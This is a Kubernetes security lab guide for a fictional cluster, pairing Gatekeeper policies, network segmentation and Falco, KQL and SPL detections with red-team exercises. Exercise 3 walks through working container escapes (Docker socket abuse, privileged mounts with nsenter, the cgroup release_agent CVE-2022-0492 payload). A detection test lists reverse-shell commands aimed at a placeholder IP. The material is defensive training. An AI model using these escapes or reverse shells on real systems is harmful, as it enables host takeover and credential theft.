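Before shipping a ConstraintTemplate, it helps to pin down exactly which pod specs you expect it to reject. The Rego rule's logic, mirrored in Python as a quick sketch (the real enforcement is Gatekeeper's — use `opa test` or the Gatekeeper `gator` CLI for authoritative policy tests):

```python
def privileged_violations(pod_spec: dict) -> list[str]:
    """Mirror of the k8sblockprivileged Rego: flag privileged (init)containers."""
    msgs = []
    for c in pod_spec.get("containers", []):
        if c.get("securityContext", {}).get("privileged") is True:
            msgs.append(f"Privileged container not allowed: {c['name']}")
    for c in pod_spec.get("initContainers", []):
        if c.get("securityContext", {}).get("privileged") is True:
            msgs.append(f"Privileged init container not allowed: {c['name']}")
    return msgs
```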

Constraint Template — Block Host Path Volumes:

apiVersion: templates.gatekeeper.sh/v1
kind: ConstraintTemplate
metadata:
  name: k8sblockhostpath
spec:
  crd:
    spec:
      names:
        kind: K8sBlockHostPath
  targets:
    - target: admission.k8s.gatekeeper.sh
      rego: |
        package k8sblockhostpath

        violation[{"msg": msg}] {
          volume := input.review.object.spec.volumes[_]
          volume.hostPath
          msg := sprintf("hostPath volume not allowed: %v", [volume.name])
        }

Constraint Template — Require Non-Root:

apiVersion: templates.gatekeeper.sh/v1
kind: ConstraintTemplate
metadata:
  name: k8srequirenonroot
spec:
  crd:
    spec:
      names:
        kind: K8sRequireNonRoot
  targets:
    - target: admission.k8s.gatekeeper.sh
      rego: |
        package k8srequirenonroot

        violation[{"msg": msg}] {
          not input.review.object.spec.securityContext.runAsNonRoot
          container := input.review.object.spec.containers[_]
          not container.securityContext.runAsNonRoot
          msg := sprintf("Container %v must set runAsNonRoot=true", [container.name])
        }

Apply Constraints:

# Apply constraints to production namespace (SYNTHETIC)
apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sBlockPrivileged
metadata:
  name: block-privileged-prod
spec:
  match:
    kinds:
      - apiGroups: [""]
        kinds: ["Pod"]
    namespaces: ["cloudpay-prod"]

---
apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sBlockHostPath
metadata:
  name: block-hostpath-prod
spec:
  match:
    kinds:
      - apiGroups: [""]
        kinds: ["Pod"]
    namespaces: ["cloudpay-prod"]

---
apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sRequireNonRoot
metadata:
  name: require-nonroot-prod
spec:
  match:
    kinds:
      - apiGroups: [""]
        kinds: ["Pod"]
    namespaces: ["cloudpay-prod"]

# Verify constraints are enforced (SYNTHETIC)
$ kubectl get constraints
NAME                      ENFORCEMENT-ACTION   TOTAL-VIOLATIONS
block-privileged-prod     deny                 0
block-hostpath-prod       deny                 0
require-nonroot-prod      deny                 0

# Test: try deploying a privileged pod
$ kubectl run test-priv --image=nginx --namespace=cloudpay-prod \
    --overrides='{"spec":{"containers":[{"name":"test","image":"nginx","securityContext":{"privileged":true}}]}}'

Error from server (Forbidden): admission webhook "validation.gatekeeper.sh" denied the request:
  [block-privileged-prod] Privileged container not allowed: test

Detection Queries — Pod Security

KQL — Detect privileged container creation:

// KQL: Detect privileged containers created in any namespace
KubeEvents
| where TimeGenerated > ago(1h)
| where ObjectKind == "Pod"
| where Reason == "Created" or Reason == "Started"
| extend PodSpec = parse_json(Message)
| where PodSpec has "privileged" and PodSpec has "true"
| project TimeGenerated, ClusterName, Namespace, Name,
          Computer, Reason, Message
| sort by TimeGenerated desc

// KQL: Detect RBAC escalation — new ClusterRoleBinding creation
AuditLogs
| where TimeGenerated > ago(24h)
| where ObjectRef_Resource == "clusterrolebindings"
| where Verb in ("create", "patch", "update")
| extend User = tostring(User_Username)
| extend RoleName = tostring(ObjectRef_Name)
| project TimeGenerated, User, Verb, RoleName,
          SourceIPs = tostring(SourceIPs)
| sort by TimeGenerated desc

SPL — Detect pods running as root:

index=kubernetes sourcetype="kube:objects:pods"
| spath "spec.securityContext.runAsUser" output=pod_uid
| spath "spec.containers{}.securityContext.runAsUser" output=container_uid
| eval effective_uid=coalesce(container_uid, pod_uid, "0")
| where effective_uid="0"
| stats count by namespace, pod_name, effective_uid, image
| where namespace="cloudpay-prod"
| rename namespace as "Namespace", pod_name as "Pod", image as "Image"
| sort -count

// SPL: Detect service account token auto-mounting
index=kubernetes sourcetype="kube:objects:pods"
| spath "spec.automountServiceAccountToken" output=automount
| eval automount=coalesce(automount, "true")
| where automount!="false"
| stats count by namespace, pod_name, spec.serviceAccountName
| sort -count

Key Takeaways — Exercise 2

Pod Security Principles

  1. Enforce Pod Security Standards — Use namespace labels for Restricted/Baseline enforcement; never allow Privileged in production
  2. Security Context is mandatory — Always set runAsNonRoot, readOnlyRootFilesystem, allowPrivilegeEscalation: false, and drop all capabilities
  3. RBAC least privilege — Dedicated service accounts per workload; never use the default service account; disable auto-mount of tokens
  4. Admission controllers — OPA Gatekeeper or Kyverno provide policy-as-code enforcement that prevents misconfigurations before deployment
  5. Resource limits — Always set CPU and memory requests/limits to prevent DoS and enable fair scheduling
  6. Secrets management — Never embed secrets in pod specs or environment variables; use Kubernetes Secrets with CSI drivers or external vaults
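
The settings in takeaway 2 combine into one reusable baseline. A sketch of a hardened pod manifest applying these principles (the pod name, image tag, and resource values are illustrative):

```yaml
# Hardened baseline pod spec (illustrative — adapt names and values)
apiVersion: v1
kind: Pod
metadata:
  name: hardened-example
  namespace: cloudpay-prod
spec:
  automountServiceAccountToken: false
  securityContext:
    runAsNonRoot: true
    runAsUser: 10001
    seccompProfile:
      type: RuntimeDefault
  containers:
  - name: app
    image: registry.novstar.example.com/app:latest
    securityContext:
      allowPrivilegeEscalation: false
      readOnlyRootFilesystem: true
      capabilities:
        drop: ["ALL"]
    resources:
      requests: {cpu: 100m, memory: 128Mi}
      limits: {cpu: 500m, memory: 256Mi}
```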

Exercise 3: Container Escape & Privilege Escalation

Objective

Understand common container escape techniques, simulate them in a controlled environment, and build detection rules using Falco, KQL, and SPL. This exercise covers both the red team (attack) and blue team (detection) perspectives.

Educational Purpose Only

Container escape techniques are demonstrated here exclusively for defensive education. Understanding how escapes work enables security teams to build detection and prevention controls. Never attempt these techniques on systems without explicit written authorization.

Prerequisites

  • Lab cluster running with a dedicated attack-lab namespace (not production)
  • Falco installed for runtime detection
  • Understanding of Linux namespaces and cgroups

Step 3.1: Escape via Mounted Docker Socket

When a container has the Docker socket (/var/run/docker.sock) mounted, an attacker can interact with the Docker daemon on the host, effectively breaking out of the container.

# Create a deliberately vulnerable pod in attack-lab namespace (SYNTHETIC)
$ kubectl create namespace attack-lab
$ kubectl label namespace attack-lab pod-security.kubernetes.io/enforce=privileged

# Deploy vulnerable pod with Docker socket mounted
$ cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: vulnerable-socket-pod
  namespace: attack-lab
spec:
  containers:
  - name: attacker
    image: registry.novstar.example.com/ubuntu-tools:latest
    command: ["/bin/bash", "-c", "sleep infinity"]
    volumeMounts:
    - name: docker-sock
      mountPath: /var/run/docker.sock
  volumes:
  - name: docker-sock
    hostPath:
      path: /var/run/docker.sock
      type: Socket
EOF

# Exec into the pod (SYNTHETIC — educational simulation)
$ kubectl exec -it vulnerable-socket-pod -n attack-lab -- /bin/bash

# Inside the pod: discover Docker socket is available
root@vulnerable-socket-pod:/# ls -la /var/run/docker.sock
srw-rw---- 1 root docker 0 Mar 24 10:00 /var/run/docker.sock

# Install Docker CLI inside the container
root@vulnerable-socket-pod:/# curl -fsSL https://get.docker.com -o get-docker.sh
root@vulnerable-socket-pod:/# sh get-docker.sh

# List containers on the HOST (proof of escape)
root@vulnerable-socket-pod:/# docker ps
CONTAINER ID   IMAGE                    COMMAND            STATUS        NAMES
a1b2c3d4e5f6   payment-gateway:v2.2.0   "python3 app.py"   Up 3 hours   k8s_payment...
f6e5d4c3b2a1   auth-service:v1.5.0      "node server.js"   Up 3 hours   k8s_auth...
...

# Create a privileged container that mounts the host root filesystem
root@vulnerable-socket-pod:/# docker run -it --privileged --pid=host \
    -v /:/hostfs registry.novstar.example.com/ubuntu-tools:latest \
    chroot /hostfs /bin/bash

# Now running as root on the HOST (SYNTHETIC — escape achieved)
root@host:/# whoami
root
root@host:/# cat /etc/hostname
ip-10-50-1-10.ec2.internal
root@host:/# cat /etc/shadow | head -3
root:REDACTED:19400:0:99999:7:::

Attack chain summary:

Container with Docker socket mounted
    → Docker CLI installed in container
    → List host containers via socket
    → Create new privileged container mounting host /
    → chroot into host filesystem
    → Full host root access achieved

Step 3.2: Escape via Privileged Container

A container running with --privileged has access to all host devices, can load kernel modules, and can mount the host filesystem.

# Deploy a privileged container (SYNTHETIC — attack-lab namespace only)
$ cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: vulnerable-privileged-pod
  namespace: attack-lab
spec:
  containers:
  - name: attacker
    image: registry.novstar.example.com/ubuntu-tools:latest
    command: ["/bin/bash", "-c", "sleep infinity"]
    securityContext:
      privileged: true
EOF

# Exec into the privileged pod (SYNTHETIC)
$ kubectl exec -it vulnerable-privileged-pod -n attack-lab -- /bin/bash

# Check available devices — privileged containers see host devices
root@vulnerable-privileged-pod:/# fdisk -l
Disk /dev/nvme0n1: 100 GiB, 107374182400 bytes, 209715200 sectors
...

# Mount the host root filesystem
root@vulnerable-privileged-pod:/# mkdir -p /mnt/hostfs
root@vulnerable-privileged-pod:/# mount /dev/nvme0n1p1 /mnt/hostfs

# Access host files (SYNTHETIC)
root@vulnerable-privileged-pod:/# cat /mnt/hostfs/etc/hostname
ip-10-50-1-10.ec2.internal

root@vulnerable-privileged-pod:/# cat /mnt/hostfs/etc/kubernetes/admin.conf
apiVersion: v1
clusters:
- cluster:
    certificate-authority-data: REDACTED
    server: https://203.0.113.10:6443
  name: cloudpay-prod
...

# Escape via nsenter — enter all host namespaces
root@vulnerable-privileged-pod:/# nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash

# Now in the host namespace as root
root@ip-10-50-1-10:/# ps aux | head -5
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1  169556  9352 ?        Ss   08:00   0:03 /sbin/init
root         2  0.0  0.0       0     0 ?        S    08:00   0:00 [kthreadd]
...

Attack chain summary:

Privileged container
    → Access host /dev devices
    → Mount host root partition
    → Read sensitive files (kubelet config, SSH keys, etc.)
    → OR: nsenter --target 1 (PID 1 = host init)
    → Full host namespace access

Step 3.3: Escape via cgroup Release Agent (CVE-2022-0492)

# Inside a container with SYS_ADMIN capability (SYNTHETIC)
# This technique exploits cgroup v1 release_agent to execute
# commands on the host when a cgroup is emptied

root@vulnerable-pod:/# mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp

# Set up the release agent to execute a payload on the host
root@vulnerable-pod:/# mkdir /tmp/cgrp/escape
root@vulnerable-pod:/# echo 1 > /tmp/cgrp/escape/notify_on_release

# Find the container's path on the host
root@vulnerable-pod:/# host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
root@vulnerable-pod:/# echo "$host_path/cmd" > /tmp/cgrp/release_agent

# Create the escape payload (writes proof file on host) — SYNTHETIC
root@vulnerable-pod:/# cat > /cmd <<EOF
#!/bin/bash
hostname > /tmp/escape-proof.txt
id >> /tmp/escape-proof.txt
EOF
root@vulnerable-pod:/# chmod +x /cmd

# Trigger the release agent by emptying the cgroup
root@vulnerable-pod:/# sh -c "echo \$\$ > /tmp/cgrp/escape/cgroup.procs"

# The command was executed on the host (SYNTHETIC)
# Host now has /tmp/escape-proof.txt with:
#   ip-10-50-1-10.ec2.internal
#   uid=0(root) gid=0(root) groups=0(root)
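
The sed one-liner above extracts the container's overlayfs upperdir, which gives the payload's path as seen from the host. The same extraction can be sanity-checked offline; the mtab entry below is synthetic:

```python
import re

# Synthetic /etc/mtab overlay entry as seen inside a container
mtab_line = ("overlay / overlay rw,relatime,"
             "lowerdir=/var/lib/docker/overlay2/l/AAAA,"
             "upperdir=/var/lib/docker/overlay2/1a2b3c/diff,"
             "workdir=/var/lib/docker/overlay2/1a2b3c/work 0 0")

# Equivalent of: sed -n 's/.*\perdir=\([^,]*\).*/\1/p'
# Matches "upperdir=" and captures everything up to the next comma:
# the host-side path of the container's writable layer.
host_path = re.search(r"upperdir=([^,]*)", mtab_line).group(1)
print(host_path)  # /var/lib/docker/overlay2/1a2b3c/diff
```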

Step 3.4: Detect Container Escapes with Falco

Install Falco and deploy detection rules:

# Install Falco via Helm (SYNTHETIC)
$ helm repo add falcosecurity https://falcosecurity.github.io/charts
$ helm install falco falcosecurity/falco \
    --namespace monitoring \
    --set driver.kind=ebpf \
    --set falcosidekick.enabled=true \
    --set falcosidekick.webui.enabled=true

NAME: falco
STATUS: deployed

Custom Falco Rules for Container Escape Detection:

# falco-container-escape-rules.yaml (SYNTHETIC)
# Detection rules for container escape techniques

# Rule 1: Docker socket access from container
- rule: Container Accessing Docker Socket
  desc: Detect a container process reading or writing to the Docker socket
  condition: >
    evt.type in (open, openat, connect) and
    container and
    fd.name = "/var/run/docker.sock"
  output: >
    Docker socket accessed from container
    (user=%user.name command=%proc.cmdline container_id=%container.id
     container_name=%container.name image=%container.image.repository
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: CRITICAL
  tags: [container, escape, docker_socket, T1611]

# Rule 2: Privileged container started
- rule: Privileged Container Started
  desc: Detect a privileged container being started
  condition: >
    evt.type = container and
    container.privileged = true
  output: >
    Privileged container started
    (container_id=%container.id container_name=%container.name
     image=%container.image.repository namespace=%k8s.ns.name
     pod=%k8s.pod.name)
  priority: CRITICAL
  tags: [container, escape, privileged, T1611]

# Rule 3: nsenter detected in container
- rule: NSEnter Used in Container
  desc: Detect nsenter being used inside a container (namespace escape)
  condition: >
    spawned_process and
    container and
    proc.name = "nsenter"
  output: >
    nsenter executed in container — potential namespace escape
    (user=%user.name command=%proc.cmdline container_id=%container.id
     container_name=%container.name image=%container.image.repository
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: CRITICAL
  tags: [container, escape, nsenter, T1611]

# Rule 4: Mount command in container
- rule: Mount Command in Container
  desc: Detect mount being used inside a container (filesystem escape)
  condition: >
    spawned_process and
    container and
    proc.name = "mount" and
    not proc.cmdline contains "tmpfs"
  output: >
    mount executed in container — potential filesystem escape
    (user=%user.name command=%proc.cmdline container_id=%container.id
     container_name=%container.name namespace=%k8s.ns.name
     pod=%k8s.pod.name)
  priority: HIGH
  tags: [container, escape, mount, T1611]

# Rule 5: cgroup release agent modification
- rule: Cgroup Release Agent Modified
  desc: Detect modification of cgroup release_agent — potential container escape
  condition: >
    open_write and
    container and
    fd.name endswith "release_agent"
  output: >
    cgroup release_agent modified in container — likely escape attempt
    (user=%user.name command=%proc.cmdline file=%fd.name
     container_id=%container.id container_name=%container.name
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: CRITICAL
  tags: [container, escape, cgroup, CVE-2022-0492, T1611]

# Rule 6: Host device access from container
- rule: Container Accessing Host Device
  desc: Detect container accessing host block devices
  condition: >
    (evt.type in (open, openat)) and
    container and
    fd.name startswith "/dev/" and
    not fd.name in ("/dev/null", "/dev/zero", "/dev/urandom", "/dev/random",
                    "/dev/stdin", "/dev/stdout", "/dev/stderr") and
    not fd.name startswith "/dev/pts" and
    not fd.name startswith "/dev/shm"
  output: >
    Container accessing host device — potential escape via device mount
    (user=%user.name command=%proc.cmdline device=%fd.name
     container_id=%container.id container_name=%container.name
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: HIGH
  tags: [container, escape, device, T1611]

# Rule 7: Kubernetes service account token access
- rule: Service Account Token Read
  desc: Detect process reading Kubernetes service account token
  condition: >
    open_read and
    container and
    fd.name startswith "/var/run/secrets/kubernetes.io/serviceaccount"
  output: >
    Service account token read in container
    (user=%user.name command=%proc.cmdline container_id=%container.id
     container_name=%container.name namespace=%k8s.ns.name
     pod=%k8s.pod.name file=%fd.name)
  priority: WARNING
  tags: [container, credential_access, kubernetes, T1528]

# Rule 8: Reverse shell detection in container
- rule: Reverse Shell in Container
  desc: Detect reverse shell being spawned inside a container
  condition: >
    spawned_process and
    container and
    ((proc.name in ("bash", "sh", "dash") and proc.cmdline contains "/dev/tcp") or
     (proc.name = "python" and proc.cmdline contains "socket") or
     (proc.name = "nc" and proc.cmdline contains "-e") or
     (proc.name = "ncat" and proc.cmdline contains "--exec"))
  output: >
    Reverse shell spawned in container
    (user=%user.name command=%proc.cmdline container_id=%container.id
     container_name=%container.name namespace=%k8s.ns.name
     pod=%k8s.pod.name)
  priority: CRITICAL
  tags: [container, execution, reverse_shell, T1059]
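
Rule 8's heuristics can be exercised against synthetic process events before deploying them; a simplified Python sketch (the function and event list are illustrative, mirroring Falco's proc.name and proc.cmdline fields):

```python
# Simplified offline version of Falco Rule 8's reverse-shell heuristics.
# Each event carries a process name and command line, mirroring Falco's
# proc.name / proc.cmdline fields. All commands below are SYNTHETIC.

def is_reverse_shell(proc_name, cmdline):
    if proc_name in ("bash", "sh", "dash") and "/dev/tcp" in cmdline:
        return True
    if proc_name == "python" and "socket" in cmdline:
        return True
    if proc_name == "nc" and "-e" in cmdline.split():
        return True
    if proc_name == "ncat" and "--exec" in cmdline:
        return True
    return False

events = [
    ("bash", "bash -i >& /dev/tcp/203.0.113.50/4444 0>&1"),  # SYNTHETIC attack
    ("nc",   "nc 203.0.113.50 4444 -e /bin/sh"),             # SYNTHETIC attack
    ("bash", "bash -c 'sleep infinity'"),                    # benign
]
alerts = [cmd for name, cmd in events if is_reverse_shell(name, cmd)]
print(len(alerts))  # 2
```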

# Deploy the custom rules (SYNTHETIC)
$ kubectl create configmap falco-custom-rules \
    --from-file=falco-container-escape-rules.yaml \
    --namespace monitoring

# Verify Falco is detecting events
$ kubectl logs -l app.kubernetes.io/name=falco -n monitoring --tail=20

10:45:32.123456789: Critical Docker socket accessed from container
  (user=root command=docker ps container_id=a1b2c3d4
   container_name=attacker image=registry.novstar.example.com/ubuntu-tools
   namespace=attack-lab pod=vulnerable-socket-pod)

10:46:15.987654321: Critical nsenter executed in container — potential namespace escape
  (user=root command=nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash
   container_id=b2c3d4e5
   container_name=attacker image=registry.novstar.example.com/ubuntu-tools
   namespace=attack-lab pod=vulnerable-privileged-pod)

Detection Queries — Container Escape

KQL — Detect container escape indicators:

// KQL: Detect Docker socket access from within containers
ContainerLog
| where TimeGenerated > ago(1h)
| where LogEntry has_any ("docker.sock", "/var/run/docker.sock")
| project TimeGenerated, ContainerID, LogEntry, Image, Name
| sort by TimeGenerated desc

// KQL: Detect nsenter or chroot execution in containers
SecurityEvent
| where TimeGenerated > ago(1h)
| where ProcessName in ("nsenter", "chroot", "unshare")
| where ContainerID != ""
| project TimeGenerated, Computer, ProcessName, CommandLine,
          ContainerID, Account
| sort by TimeGenerated desc

// KQL: Detect privileged pod creation via Kubernetes audit logs
AzureDiagnostics
| where Category == "kube-audit"
| where log_s has "privileged" and log_s has "true"
| extend AuditLog = parse_json(log_s)
| extend User = tostring(AuditLog.user.username)
| extend Verb = tostring(AuditLog.verb)
| extend Resource = tostring(AuditLog.objectRef.resource)
| extend Namespace = tostring(AuditLog.objectRef.namespace)
| where Verb in ("create", "update", "patch")
| project TimeGenerated, User, Verb, Resource, Namespace,
          SourceIP = tostring(AuditLog.sourceIPs[0])
| sort by TimeGenerated desc

// KQL: Hunt for container escape indicators in container logs
let escape_indicators = dynamic(["nsenter", "mount /dev/", "chroot",
    "release_agent", "docker.sock", "cgroup"]);
ContainerLog
| where TimeGenerated > ago(4h)
| where LogEntry has_any (escape_indicators)
| extend Indicator = extract(@"(nsenter|mount /dev/|chroot|release_agent|docker\.sock|cgroup)", 1, LogEntry)
| summarize Count=count(), Indicators=make_set(Indicator) by ContainerID, Image
| sort by Count desc

SPL — Detect container escape patterns:

// SPL: Detect Docker socket access inside containers
index=kubernetes sourcetype="falco"
| where rule="Container Accessing Docker Socket"
| stats count by container_name, container_id, k8s_ns_name, k8s_pod_name, image
| sort -count
| rename k8s_ns_name as "Namespace", k8s_pod_name as "Pod",
         container_name as "Container", image as "Image"

// SPL: Detect privilege escalation attempts in containers
index=kubernetes sourcetype="falco"
| where priority IN ("Critical", "Error")
| where rule IN ("NSEnter Used in Container", "Privileged Container Started",
                  "Cgroup Release Agent Modified", "Container Accessing Host Device")
| stats count by rule, container_name, k8s_ns_name, k8s_pod_name, user_name
| sort -count

// SPL: Detect anomalous process execution in containers
index=kubernetes sourcetype="kube:container:exec"
| eval suspicious=if(match(command, "(nsenter|chroot|mount|fdisk|docker|kubectl)"), "yes", "no")
| where suspicious="yes"
| stats count values(command) as commands by namespace, pod_name, container_name, user
| sort -count
| rename namespace as "Namespace", pod_name as "Pod", commands as "Suspicious Commands"

Step 3.5: Prevention Checklist

| Control                            | Implementation                             | Prevents                              |
|------------------------------------|--------------------------------------------|---------------------------------------|
| Pod Security Standards: Restricted | Namespace label enforcement                | Privileged containers, hostPath, root |
| Drop all capabilities              | securityContext.capabilities.drop: ["ALL"] | Capability-based escapes              |
| Read-only root filesystem          | readOnlyRootFilesystem: true               | Writing escape payloads               |
| Disable service account auto-mount | automountServiceAccountToken: false        | Kubernetes API abuse from pod         |
| Seccomp profile                    | seccompProfile.type: RuntimeDefault        | Blocks dangerous syscalls             |
| AppArmor profile                   | Pod annotation with custom profile         | Restricts file/network access         |
| No hostPID / hostNetwork           | Pod Security Standard enforcement          | Namespace escapes                     |
| Admission controller               | OPA Gatekeeper / Kyverno                   | Policy violation prevention           |
| Runtime detection                  | Falco with custom rules                    | Real-time alerting on escape attempts |

Key Takeaways — Exercise 3

Container Escape Defense

  1. Mounted Docker sockets are critical vulnerabilities — Never mount /var/run/docker.sock in production containers; use the Kubernetes API instead
  2. Privileged containers = host access — A privileged container has effectively no isolation; treat it as running directly on the host
  3. Defense in depth matters — Prevention (admission controllers) + detection (Falco) + response (automated remediation) all work together
  4. cgroup and namespace escapes are real threats — Keep kernels patched, enforce seccomp profiles, and monitor for syscall anomalies
  5. ATT&CK mapping — Container escapes map to T1611 (Escape to Host); credential access to T1528 (Steal Application Access Token)
  6. Red team informs blue team — Understanding attack techniques is essential for building effective detection rules

Exercise 4: Network Policies & Service Mesh

Objective

Implement network segmentation for the CloudPay Kubernetes cluster using NetworkPolicy, Calico/Cilium extended policies, and Istio service mesh with mTLS. Prevent lateral movement between microservices.

Prerequisites

  • Kubernetes cluster with a CNI that supports NetworkPolicy (Calico or Cilium)
  • Istio installed in the cluster
  • Understanding of Kubernetes networking model

Step 4.1: Audit Default Network Posture

By default, Kubernetes allows all pod-to-pod communication. This means any compromised pod can communicate with any other pod in the cluster.

# Verify default network behavior — all pods can communicate (SYNTHETIC)
$ kubectl run test-client --image=busybox --namespace=cloudpay-prod \
    --command -- sleep 3600

# From test-client, reach the payment gateway (should work without NetworkPolicy)
$ kubectl exec test-client -n cloudpay-prod -- wget -qO- http://payment-gateway:8080/healthz
{"status": "healthy", "version": "2.2.0"}

# From test-client, reach the auth service (should also work — no segmentation)
$ kubectl exec test-client -n cloudpay-prod -- wget -qO- http://auth-service:8080/healthz
{"status": "healthy", "version": "1.5.0"}

# From test-client, reach services in OTHER namespaces (cross-namespace)
$ kubectl exec test-client -n cloudpay-prod -- wget -qO- \
    http://prometheus-server.monitoring.svc.cluster.local:9090/api/v1/targets
{"status":"success","data":{"activeTargets":[...]}}

Risk: A compromised pod in cloudpay-prod can reach the monitoring stack, databases, and any other service cluster-wide.

Step 4.2: Implement Default-Deny NetworkPolicy

# Default-deny all ingress and egress in production namespace (SYNTHETIC)
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: cloudpay-prod
spec:
  podSelector: {}   # Applies to ALL pods in namespace
  policyTypes:
  - Ingress
  - Egress
  # No ingress or egress rules = deny all

# Apply default-deny (SYNTHETIC)
$ kubectl apply -f default-deny-all.yaml
networkpolicy.networking.k8s.io/default-deny-all created

# Verify — test-client can no longer reach any service
$ kubectl exec test-client -n cloudpay-prod -- wget -qO- --timeout=3 \
    http://payment-gateway:8080/healthz
wget: download timed out

# Even DNS is blocked
$ kubectl exec test-client -n cloudpay-prod -- nslookup payment-gateway
;; connection timed out; no servers could be reached

Step 4.3: Allow Required Traffic with Fine-Grained Policies

# Allow DNS resolution for all pods (required for service discovery)
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-dns
  namespace: cloudpay-prod
spec:
  podSelector: {}
  policyTypes:
  - Egress
  egress:
  - to:
    - namespaceSelector:
        matchLabels:
          kubernetes.io/metadata.name: kube-system
    ports:
    - protocol: UDP
      port: 53
    - protocol: TCP
      port: 53

---
# Payment gateway: allow ingress from ingress controller only
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: payment-gateway-ingress
  namespace: cloudpay-prod
spec:
  podSelector:
    matchLabels:
      app: payment-gateway
  policyTypes:
  - Ingress
  ingress:
  - from:
    - namespaceSelector:
        matchLabels:
          kubernetes.io/metadata.name: ingress-nginx
      podSelector:
        matchLabels:
          app.kubernetes.io/name: ingress-nginx
    ports:
    - protocol: TCP
      port: 8080

---
# Payment gateway: allow egress to auth-service and database only
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: payment-gateway-egress
  namespace: cloudpay-prod
spec:
  podSelector:
    matchLabels:
      app: payment-gateway
  policyTypes:
  - Egress
  egress:
  # To auth-service
  - to:
    - podSelector:
        matchLabels:
          app: auth-service
    ports:
    - protocol: TCP
      port: 8080
  # To PostgreSQL database
  - to:
    - ipBlock:
        cidr: 10.50.2.10/32
    ports:
    - protocol: TCP
      port: 5432
  # To Redis cache
  - to:
    - ipBlock:
        cidr: 10.50.2.20/32
    ports:
    - protocol: TCP
      port: 6379

---
# Auth service: allow ingress from payment-gateway and user-service only
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: auth-service-ingress
  namespace: cloudpay-prod
spec:
  podSelector:
    matchLabels:
      app: auth-service
  policyTypes:
  - Ingress
  ingress:
  - from:
    - podSelector:
        matchLabels:
          app: payment-gateway
    - podSelector:
        matchLabels:
          app: user-service
    ports:
    - protocol: TCP
      port: 8080

---
# Monitoring: allow Prometheus scraping from monitoring namespace
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-prometheus-scrape
  namespace: cloudpay-prod
spec:
  podSelector:
    matchLabels:
      monitoring: enabled
  policyTypes:
  - Ingress
  ingress:
  - from:
    - namespaceSelector:
        matchLabels:
          kubernetes.io/metadata.name: monitoring
      podSelector:
        matchLabels:
          app: prometheus
    ports:
    - protocol: TCP
      port: 9090

# Apply all network policies (SYNTHETIC)
$ kubectl apply -f network-policies/
networkpolicy.networking.k8s.io/allow-dns created
networkpolicy.networking.k8s.io/payment-gateway-ingress created
networkpolicy.networking.k8s.io/payment-gateway-egress created
networkpolicy.networking.k8s.io/auth-service-ingress created
networkpolicy.networking.k8s.io/allow-prometheus-scrape created

# Verify — payment gateway can reach auth-service
$ kubectl exec deployment/payment-gateway -n cloudpay-prod -- \
    wget -qO- --timeout=3 http://auth-service:8080/healthz
{"status": "healthy", "version": "1.5.0"}

# Verify — payment gateway CANNOT reach reporting-service (not in policy)
$ kubectl exec deployment/payment-gateway -n cloudpay-prod -- \
    wget -qO- --timeout=3 http://reporting-service:8080/healthz
wget: download timed out

# Verify — payment gateway CANNOT reach monitoring namespace
$ kubectl exec deployment/payment-gateway -n cloudpay-prod -- \
    wget -qO- --timeout=3 http://prometheus-server.monitoring:9090/api/v1/targets
wget: download timed out
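
The allow and deny outcomes above follow from the NetworkPolicy model: once any policy selects a pod for a direction, the pod is isolated and only explicitly allowed peers get through. A much-simplified, ingress-only Python model (a hypothetical illustration; labels are synthetic, and ports and namespaces are ignored):

```python
# Much-simplified model of NetworkPolicy ingress evaluation (illustrative only).
# A pod is "isolated" for ingress once any policy selects it; traffic is then
# allowed only if some selecting policy lists a matching source selector.

def selects(selector, labels):
    """Empty selector ({}) matches every pod, like podSelector: {}."""
    return all(labels.get(k) == v for k, v in selector.items())

def ingress_allowed(policies, src_labels, dst_labels):
    selecting = [p for p in policies if selects(p["podSelector"], dst_labels)]
    if not selecting:
        return True  # not isolated: Kubernetes default-allow applies
    return any(selects(rule, src_labels)
               for p in selecting
               for rule in p.get("allowFrom", []))

policies = [
    {"podSelector": {}, "allowFrom": []},                  # default-deny-all
    {"podSelector": {"app": "auth-service"},               # auth-service-ingress
     "allowFrom": [{"app": "payment-gateway"},
                   {"app": "user-service"}]},
]
print(ingress_allowed(policies, {"app": "payment-gateway"},
                      {"app": "auth-service"}))            # True
print(ingress_allowed(policies, {"app": "reporting-service"},
                      {"app": "auth-service"}))            # False
```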

Step 4.4: Calico Extended Network Policies

Calico provides extended policy features beyond standard Kubernetes NetworkPolicy, including global (cluster-wide) policies, application-layer rules, and DNS-based egress policies (the domains field requires Calico Enterprise).

# Calico GlobalNetworkPolicy — block egress to metadata service (SYNTHETIC)
# Prevents SSRF attacks targeting cloud metadata (169.254.169.254)
apiVersion: projectcalico.org/v3
kind: GlobalNetworkPolicy
metadata:
  name: deny-cloud-metadata
spec:
  order: 10          # Lower order = evaluated before other policies
  selector: all()
  types:
  - Egress
  egress:
  - action: Deny
    protocol: TCP
    destination:
      nets:
      - 169.254.169.254/32
  # Final Allow so that selecting all() for Egress does not become an
  # accidental cluster-wide default-deny for everything else
  - action: Allow

---
# Calico NetworkPolicy — DNS-based egress control (SYNTHETIC)
apiVersion: projectcalico.org/v3
kind: NetworkPolicy
metadata:
  name: payment-gateway-dns-egress
  namespace: cloudpay-prod
spec:
  selector: app == "payment-gateway"
  types:
  - Egress
  egress:
  # Allow egress only to specific external domains (Calico Enterprise feature)
  - action: Allow
    protocol: TCP
    destination:
      domains:
